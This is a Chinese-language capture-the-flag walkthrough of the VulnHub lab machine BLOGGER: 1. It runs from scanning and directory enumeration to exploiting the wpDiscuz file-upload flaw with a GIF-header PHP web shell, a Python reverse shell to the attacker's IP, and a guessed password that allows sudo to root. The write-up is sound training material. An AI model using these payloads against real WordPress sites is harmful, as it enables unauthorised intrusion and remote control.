【靶机渗透】BLOGGER

靶机渗透
, , , , ,

【靶机渗透】BLOGGER: 1

本篇将分享一个来源于VulnHub社区,适合初学者的靶机BLOGGER: 1

0x01靶机介绍

1. 详情

链接 https://www.vulnhub.com/entry/blogger-1,675/
发布日期 2021年4月4日
作者 TheHackersBrain
难度 初学者,简单

2. 描述

(一般VulnHub的靶机都有些情景模式,类似于游戏任务,增加趣味性、真实性)

James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style :)

一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。以机器人先生的风格破解你的方式:)

0x02环境搭建

1. 下载靶机

官网链接直接下载

image-20210614114827948

觉得官网下载慢的朋友,可以后台回复 B1 获取资源

2. 创建靶机

下载好后直接将ova文件拖入VMware虚拟机即可,也可以使用VirtualBox 创建

image-20210614115802144

等待导入完成

image-20210614115908039

创建完成

image-20210614115948973

3. 开启靶机

点击 ▶开启此虚拟机

image-20210614121037055

0x03靶机渗透

攻击机使用Kali Linux (IP:192.168.64.133)

1. 主机发现

1
arp-scan -l

发现目标主机 192.168.64.140

image-20210614123617154

2. 端口扫描

1
masscan 192.168.64.140 --rate=10000 --ports 0-65535

image-20210614123805989

仅识别2个开放的tcp端口22,80

3. 服务扫描

1
nmap -T4 -sV -p22,80 -O 192.168.64.140

-sV服务版本 -T4速度(最高为5,推荐用4) -O系统 -p 指定端口

image-20210614124433908

22是ssh,80是Apache http服务

到现在有两个思路

  • ssh爆破
  • web漏洞入侵

先进行web信息收集

4. web信息收集

访问http://192.168.64.140/

(添加Hosts的话可直接访问http://blogger.thm/)

image-20210614172318292

主页上没有可以利用的地方,登录处会跳转到主页

接下来进行目录扫描,看能否找到可利用信息,用的工具是kali自带的dirb目录扫描工具,这里使用默认字典

1
dirb http://192.168.64.140/

image-20210614125416011

目录遍历漏洞,看看有没有可以利用的地方

image-20210614172417525

/assets/fonts发现 blog/文件夹

image-20210614172442225

点开后发现是一个wordpress的站点

image-20210614172519229

再用wpscan工具扫描该站点是否存在漏洞

1
wpscan --url http://blogger.thm/assets/fonts/blog/

image-20210614141100871

可能是wpscan api的原因,并未扫到什么

在网站文章评论处发现好像是WordPress评论插件wpDiscuz,F12查看源码验证,果真是wpDiscuz

image-20210614172751025

wpDiscuz插件有任意文件上传漏洞

0x04漏洞利用

1. 上传webshell

点击评论栏图片标签,上传phpinfo文件,用Burp抓包

image-20210614173814052

wpDiscuz插件会使用mime_content_type函数来获取MIME类型,但是该函数在获取MIME类型是通过文件的十六进制起始字节来判断,所以只要文件头符合图片类型即可绕过

加上GIF头,也可用图片马

1
GIF89a<?php phpinfo();?>

image-20210614174111684

成功上传,并返回路径

1
http:\/\/blogger.thm\/assets\/fonts\/blog\/wp-content\/uploads\/2021\/06\/phpinfo-1623687844.54.php

访问phpinfo

image-20210614174233243

接下来就是上传反弹shell

1
GIF89a<?php @system($_GET['cmd']); ?>

上传成功

image-20210614213052502

2. 反弹shell

使用harkbar工具传递执行python反弹shell

1
2
3
4
5
6
7
python3 -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.64.133",7777));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

image-20210614213138807

攻击机nc监听

image-20210614213240779

反弹成功

3. 权限提升

通过以下命令获取一个标准shell

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

image-20210614213447365

花了点时间,猜解到vagrant的密码是vagrant

运行sudo -l命令显示vagrant可以运行所有命令,可以直接切换到root用户

image-20210614214215107

1
sudo su

image-20210614214408149

4. 拿flag

falg1

在/home/james找到user.txt文件,发现为base64编码

image-20210614214945311

解码

1
echo -n "ZmxhZ3tZMHVfRCFEXzE3IDopfQ==" | base64 -d

image-20210614215224731

得到flag1:flag{Y0u_D!D_17 :)}

falg2

在/root找到root.txt文件

image-20210614215452016

同理解码

image-20210614215548790

得到flag2:flag{W311_D0n3_Y0u_P3n3tr4t3d_M3 :)}

0x05总结

这个靶机主要考察目录枚举、WP插件漏洞利用,文件上传姿势,反弹shell等内容,是一个不错的靶机,适合初级练习。在练习的过程中注意对以及靶机网卡,hosts文件的配置。

如果你想快速获取BLOGGER: 1靶机的资源,后台回复B1即可。